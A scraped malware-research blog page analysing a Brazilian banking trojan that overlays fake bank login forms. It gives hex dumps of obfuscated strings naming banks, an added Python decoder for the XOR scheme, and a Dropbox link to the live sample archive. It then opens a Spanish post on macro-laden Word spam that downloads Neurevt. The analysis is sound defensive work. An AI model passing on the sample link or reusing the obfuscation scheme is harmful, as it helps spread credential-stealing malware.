<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinp8DcfS3iomWMlVenEpR_ogN1PzzmHtnDP6jWrt46DKaxTZxyk1KIDvlEFMyyaQvadVMge-soxmS7TJtJwrMC5DcCNe_yRODK05XJ4pu7Zr24x7J-7HXOzHfS5ZmzWeyit0oajIQTNFE/s1600/bk16.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="30" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinp8DcfS3iomWMlVenEpR_ogN1PzzmHtnDP6jWrt46DKaxTZxyk1KIDvlEFMyyaQvadVMge-soxmS7TJtJwrMC5DcCNe_yRODK05XJ4pu7Zr24x7J-7HXOzHfS5ZmzWeyit0oajIQTNFE/s400/bk16.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZRL-6TzwEOS9yhDjt-9J_7M52E5lUfM8kfcH1Cp0W31MaEsBAst5OkUIoKD0sPPebne5OQTAxx2J0GuJUbi00QNY1ptXyZIphm4wQxRnI4So5-wiynNUpEVKu58Oa8LIJlDKhRvI8b4A/s1600/gbplugin.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="35" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZRL-6TzwEOS9yhDjt-9J_7M52E5lUfM8kfcH1Cp0W31MaEsBAst5OkUIoKD0sPPebne5OQTAxx2J0GuJUbi00QNY1ptXyZIphm4wQxRnI4So5-wiynNUpEVKu58Oa8LIJlDKhRvI8b4A/s400/gbplugin.jpg" width="400" /></a></div>
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Here are some of the obfuscated strings and the result of decoding them.</span><br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">07C040B8 37 41 38 34 43 45 37 34 7A84CE74</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C040C0 38 42 43 37 30 33 35 32 8BC70352</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C040C8 46 38 32 31 35 36 38 46 F821568F</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C040D0 33 43 31 39 36 41 41 41 3C196AAA</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C040D8 32 46 39 39 42 34 31 30 2F99B410</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C040E0 42 37 39 43 46 30 30 37 B79CF007</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C040E8 33 33 41 31 33 30 44 46 33A130DF</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C040F0 31 42 34 42 38 45 39 38 1B4B8E98</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C040F8 44 33 30 43 42 34 45 43 D30CB4EC</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C04100 30 34 34 39 38 44 33 34 04498D34</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C04108 41 31 34 30 46 39 31 37 A140F917</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C06F2C 42 72 61 64 65 73 63 6F Bradesco</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C06F34 20 4E 65 74 20 45 78 70 Net Exp</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C06F3C 72 65 73 73 20 28 42 72 ress (Br</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C06F44 61 64 65 73 63 6F 20 4E adesco N</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C06F4C 65 74 20 45 78 70 72 65 et Expre</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C06F54 73 73 29 ss)</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0ADD4 39 45 43 39 31 37 43 44 9EC917CD</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0ADDC 37 43 44 38 30 32 31 36 7CD80216</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0ADE4 36 32 45 32 36 41 46 42 62E26AFB</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0ADEC 35 36 46 41 36 38 39 45 56FA689E</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0A060 53 65 72 61 73 61 20 45 Serasa E</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A068 78 70 65 72 69 61 6E 00 xperian.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A070 22 00 00 00 01 00 00 00 "... ...</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A078 11 00 00 00 42 61 6E 63 ...Banc</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A080 6F 20 64 6F 20 4E 6F 72 o do Nor</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A088 64 65 73 74 65 deste</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0A0F8 74 72 61 6E 73 66 65 72 transfer</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A100 65 6E 63 69 61 73 00 encias.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0A444 44 30 31 46 42 43 36 42 D01FBC6B</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A44C 38 37 44 41 37 43 45 42 87DA7CEB</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A454 37 34 44 41 30 36 34 31 74DA0641</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A45C 35 39 38 39 43 43 37 31 5989CC71</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A464 44 32 38 32 32 43 41 33 D2822CA3</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A46C 46 37 31 37 34 38 35 43 F717485C</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A474 38 35 44 46 37 31 41 43 85DF71AC</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A47C 35 37 38 44 43 46 38 31 578DCF81</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A484 44 37 D7</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C03C98 42 61 6E 63 6F 20 64 65 Banco de</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03CA0 20 42 72 61 73 ED 6C 69 Brasíli</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03CA8 61 00 a.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C03CD8 5B 62 62 2E 63 6F 6D 2E [bb.com.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03CE0 62 72 5D 00 br].</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C061C0 43 36 30 36 34 35 46 38 C60645F8</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C061C8 37 34 45 31 37 43 39 45 74E17C9E</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C061D0 33 42 39 32 33 39 35 33 3B923953</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C061D8 38 44 34 35 00 8D45.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C09A5C 77 77 77 2E 62 62 2E 63 www.bb.c</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C09A64 6F 6D 2E 62 72 om.br</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C03CF0 37 42 45 35 37 46 41 39 7BE57FA9</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03CF8 35 45 46 41 36 35 45 33 5EFA65E3</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03D00 37 43 44 37 37 38 44 30 7CD778D0</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03D08 43 36 36 46 45 41 31 30 C66FEA10</span><br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03D20 62 61 6E 63 6F 62 72 61 bancobra</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03D28 73 69 6C 2E 63 6F 6D 00 sil.com.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0A004 39 36 44 34 30 32 33 30 96D40230</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A00C 43 41 30 36 35 37 38 45 CA06578E</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A014 44 36 43 45 32 38 35 45 D6CE285E</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0591C 56 65 72 69 66 69 63 61 Verifica</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C05924 20 42 42 00 BB.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0A02C 43 37 33 32 41 42 35 45 C732AB5E</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A034 39 32 33 35 36 44 45 35 92356DE5</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A03C 36 43 42 34 43 46 37 36 6CB4CF76</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A044 45 46 32 36 42 42 36 30 EF26BB60</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0586C 42 61 6E 63 6F 20 64 6F Banco do</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C05874 20 42 72 61 73 69 6C 00 Brasil.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C05888 44 42 37 43 43 38 37 39 DB7CC879</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C05890 42 41 31 39 36 42 41 45 BA196BAE</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C05898 45 34 36 34 45 32 36 45 E464E26E</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C058A0 39 38 38 33 44 31 37 42 9883D17B</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C058A8 44 44 37 39 41 32 33 44 DD79A23D</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C058B0 39 42 42 37 31 46 42 43 9BB71FBC</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C058B8 36 33 00 63.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C093C0 68 74 74 70 73 3A 2F 2F https://</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C093C8 77 77 77 32 2E 62 61 6E www2.ban</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C093D0 63 6F 62 72 61 73 69 6C cobrasil</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C03CB8 35 32 41 43 33 36 45 30 52AC36E0</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03CC0 31 35 42 46 30 43 34 35 15BF0C45</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03CC8 38 31 81</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C093E8 42 61 6E 65 73 74 65 73 Banestes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C061EC 32 43 35 37 46 38 32 39 2C57F829</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C061F4 43 31 31 33 34 43 38 45 C1134C8E</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C061FC 43 30 C0</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C058C8 43 69 74 69 62 61 6E 6B Citibank</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C058E0 37 36 39 31 46 39 35 45 7691F95E</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C058E8 39 35 33 32 39 43 43 39 95329CC9</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C058F0 30 34 00 00 1E 00 00 00 04</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C05900 33 30 20 68 6F 72 61 73 30 horas</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C09448 43 31 33 43 39 36 42 33 C13C96B3</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C09450 34 42 38 37 43 32 31 32 4B87C212</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C09458 42 38 B8</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0A32C 42 72 61 64 65 73 63 6F Bradesco</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0A2D4 41 46 43 35 31 46 44 31 AFC51FD1</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A2DC 36 34 46 43 36 36 46 45 64FC66FE</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A2E4 35 37 46 31 32 42 34 34 57F12B44</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A2EC 38 34 41 32 33 42 46 38 84A23BF8</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A2F4 35 38 46 39 33 41 39 31 58F93A91</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0A29C 4E 61 76 65 67 61 64 6F Navegado</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A2A4 72 20 45 78 63 6C 75 73 r Exclus</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A2AC 69 76 6F 00 ivo.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07BFF438 42 38 31 41 42 30 36 31 B81AB061</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07BFF440 39 35 33 46 39 35 43 45 953F95CE</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07BFF448 37 41 45 34 37 46 44 39 7AE47FD9</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07BFF450 37 44 41 33 32 36 43 35 7DA326C5</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07BFF458 31 44 34 36 45 35 36 36 1D46E566</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07BFF460 46 33 00 F3.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0B0D0 69 6E 74 65 72 6E 65 74 internet</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0B0D8 62 61 6E 6B 69 6E 67 63 bankingc</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0B0E0 61 69 78 61 00 aixa.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07BFF470 44 33 31 46 42 38 36 33 D31FB863</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07BFF478 38 34 44 32 37 39 45 39 84D279E9</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07BFF480 37 36 44 30 76D0</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0B130 53 61 6E 74 61 6E 64 65 Santande</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0B138 72 00 00 r.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A004 41 38 34 43 45 37 34 A84CE74</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A00C 38 42 43 37 30 33 35 32 8BC70352</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A014 46 38 32 31 35 36 38 46 F821568F</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A01C 33 43 31 39 36 41 41 41 3C196AAA</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A024 32 46 39 39 42 34 31 30 2F99B410</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A02C 42 37 39 43 46 30 30 37 B79CF007</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A034 33 33 41 31 33 30 44 46 33A130DF</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A03C 31 42 34 42 38 45 39 38 1B4B8E98</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A044 44 33 30 43 42 34 45 43 D30CB4EC</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A04C 30 34 34 39 38 44 33 34 04498D34</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A054 41 31 34 30 46 39 31 37 A140F917</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C03C98 42 72 61 64 65 73 63 6F Bradesco</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03CA0 20 4E 65 74 20 45 78 70 Net Exp</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03CA8 72 65 73 73 20 28 42 72 ress (Br</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03CB0 61 64 65 73 63 6F 20 4E adesco N</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03CB8 65 74 20 45 78 70 72 65 et Expre</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C03CC0 73 73 29 00 ss).</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C06208 62 61 6E 63 6F 62 72 61 bancobra</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C06210 73 69 6C 2E 63 6F 6D 00 sil.com.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">07C0A28C 41 70 6C 69 63 61 74 69 Aplicati</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A294 76 6F 20 42 72 61 64 65 vo Brade</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">07C0A29C 73 63 6F 00 sco.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<br />
<div>
<br /></div>
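<p>As an added example (not code from the original post), here is a Python decoder for the obfuscation shown in the dump. The routine is assumed to be the classic Delphi byte-chained XOR string scrambler common to Brazilian Delphi bankers: the first ciphertext byte is only an offset seed, and each following byte is XORed with the key and then reduced, wrapping at 255, by the previous ciphertext byte. That assumption is consistent with the dump, where every n-byte blob decodes to n-1 characters. The key is not on the page, so the example recovers it from one known plaintext/ciphertext pair copied from the dump and then decodes other strings from the dump with the recovered key prefix; the key value it prints is derived here, not stated by the author.</p>

```python
"""Decoder for the byte-chained string obfuscation seen in the dump above.

Added example, not the post's own code. Assumption: the strings use the
classic Delphi "EnDeCrypt" routine seen in Brazilian Delphi bankers. The
key is not given on the page; recover_key() derives it from a known pair.
"""


def decode_string(hex_blob: str, key: bytes) -> str:
    """Decode one hex-encoded obfuscated string with the given key."""
    data = bytes.fromhex(hex_blob)
    if len(data) < 2:
        return ""
    offset = data[0]            # the first byte only seeds the chain
    out = bytearray()
    for i, src in enumerate(data[1:]):
        tmp = src ^ key[i % len(key)]
        # Undo the wrap-at-255 addition of the previous ciphertext byte.
        if tmp <= offset:
            tmp = 255 + tmp - offset
        else:
            tmp = tmp - offset
        out.append(tmp)
        offset = src            # the chain runs on ciphertext bytes
    return out.decode("latin-1")


def recover_key(hex_blob: str, plaintext: str) -> bytes:
    """Invert decode_string for a known pair and return the key bytes used.

    One pair only reveals len(plaintext) key bytes, so the result is a key
    prefix unless the pair is at least as long as the real key.
    """
    data = bytes.fromhex(hex_blob)
    offset = data[0]
    key = bytearray()
    for src, p in zip(data[1:], plaintext.encode("latin-1")):
        tmp = p + offset
        if tmp > 255:           # mirrors the "tmp <= offset" branch above
            tmp -= 255
        key.append(tmp ^ src)
        offset = src
    return bytes(key)


# Known pair copied from the dump above (ASCII column of the hex bytes,
# and the plaintext it decodes to).
KNOWN_CIPHER = "C732AB5E92356DE56CB4CF76EF26BB60"
KNOWN_PLAIN = "Banco do Brasil"

# Further obfuscated strings copied from the dump, each short enough to be
# decoded with the key prefix recovered from the pair above.
SAMPLES = [
    "96D40230CA06578ED6CE285E",
    "C60645F874E17C9E3B9239538D45",
    "7BE57FA95EFA65E37CD778D0C66FEA10",
]


def decode_samples() -> dict:
    """Recover the key prefix and decode every sample; refuse strings that
    would need key bytes the known pair did not reveal."""
    key = recover_key(KNOWN_CIPHER, KNOWN_PLAIN)
    result = {}
    for blob in SAMPLES:
        needed = len(blob) // 2 - 1
        if needed > len(key):
            raise ValueError(f"{blob}: needs {needed} key bytes, have {len(key)}")
        result[blob] = decode_string(blob, key)
    return result


if __name__ == "__main__":
    k = recover_key(KNOWN_CIPHER, KNOWN_PLAIN)
    print("recovered key prefix:", k.decode("latin-1"))
    for blob, text in decode_samples().items():
        print(f"{blob} -> {text!r}")
```

<p>Because a known pair only reveals as many key bytes as the plaintext is long, decoding the longer strings in the dump needs a longer pair; the 43-character Bradesco Net Express string in the dump is the natural choice for that.</p>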
<span style="font-family: "arial" , "helvetica" , sans-serif;">The malware is a screen overlay: it monitors the URL being visited and, according to the strings shown above, displays fake forms in which the victim enters their passwords.</span><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtKMOgY0LB5LqWE8QgO4-kQqlRZxMrgu5pzw5qB0rWAU2mn6fE3AVfUX4zLn69zmrOCylxqw4NWmrlF5AKz29CFKSubPW-DkKFGe4oJE4gl1r8u2M6tBu0WAF1sEvkWYFyhDEtCS6G93s/s1600/16.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtKMOgY0LB5LqWE8QgO4-kQqlRZxMrgu5pzw5qB0rWAU2mn6fE3AVfUX4zLn69zmrOCylxqw4NWmrlF5AKz29CFKSubPW-DkKFGe4oJE4gl1r8u2M6tBu0WAF1sEvkWYFyhDEtCS6G93s/s320/16.jpg" width="320" /></a><br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Sample: </span><span style="font-family: "arial" , "helvetica" , sans-serif;">https://www.dropbox.com/s/3csafx6c0h46pc1/banload-27-03-17.rar?dl=0</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<span style="background-color: white; color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;">That's all for now. @Dkavalanche 2017</span><br />
<br />@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com0tag:blogger.com,1999:blog-4220472203730425546.post-58751861785673169002017-03-27T12:02:00.000-07:002017-03-27T12:18:17.160-07:00<span style="background-color: white; color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><b>Thanks for the Donation: Attacks with Word documents with macros continue.</b></span><br />
<span style="background-color: white; color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><b><br /></b></span><span style="background-color: white; color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><b><br /></b></span><span style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px;"></span><span style="background-color: white; color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><b><br /></b></span><span style="background-color: white; color: #444444;"></span><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; color: #444444;">Al igual que en otros casos llega por correo spam con un zip con un documento .doc con macros maliciosas que descargan </span><span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><a href="http://www.virusradar.com/en/Win32_Neurevt.A/description">Neurevt</a></span></span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJ2ox5GbdmkKqDtjbhER2khDWjA4qY95cJPIgQrCm6X6azto3lkdJGxDfZ2TRI0CLEOCAjIw-R0uMm4_aMPeDYENm8xReQWk-7ceTKkk-oTMCNLtahfZKGDWgTBgBP83d-2223Ja4jSnM/s1600/00.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJ2ox5GbdmkKqDtjbhER2khDWjA4qY95cJPIgQrCm6X6azto3lkdJGxDfZ2TRI0CLEOCAjIw-R0uMm4_aMPeDYENm8xReQWk-7ceTKkk-oTMCNLtahfZKGDWgTBgBP83d-2223Ja4jSnM/s640/00.jpg" width="640" /></a></div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">Una vez abierto el documento se solicita habilitar el contenido, apelando una vez más al descuido de la víctima.</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiXQbQa89VYCYnH1XKEs9tWuHpF-k-O59Tb8Iob0DjPX2E5yOHIKFllLhtkwr4xudt-tJ0D740JvRsgTp6FEXa7J9c_F0cDEqGItQqheRsiBWpbxx_8U-t0uHknl0G68B0maVheIWmCnU/s1600/02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="476" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiXQbQa89VYCYnH1XKEs9tWuHpF-k-O59Tb8Iob0DjPX2E5yOHIKFllLhtkwr4xudt-tJ0D740JvRsgTp6FEXa7J9c_F0cDEqGItQqheRsiBWpbxx_8U-t0uHknl0G68B0maVheIWmCnU/s640/02.jpg" width="640" /></a></div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /><br />El macro, genera un .VBS que es el encargado de descargar el binario.</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihOpSKdonyr5oEBEEFj5MxJF2V0ELnmClppbHmXHUOyPAYKNy7jJg9CsGZEixViUivOZS52H3fFHqg2GDoQQ4EfmdLW3xVSXcFoAV0o4s9zXGFltabyHjzzGwSIOpgF7Ih9G-xotUXL3o/s1600/04.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="574" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihOpSKdonyr5oEBEEFj5MxJF2V0ELnmClppbHmXHUOyPAYKNy7jJg9CsGZEixViUivOZS52H3fFHqg2GDoQQ4EfmdLW3xVSXcFoAV0o4s9zXGFltabyHjzzGwSIOpgF7Ih9G-xotUXL3o/s640/04.jpg" width="640" /></a></div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
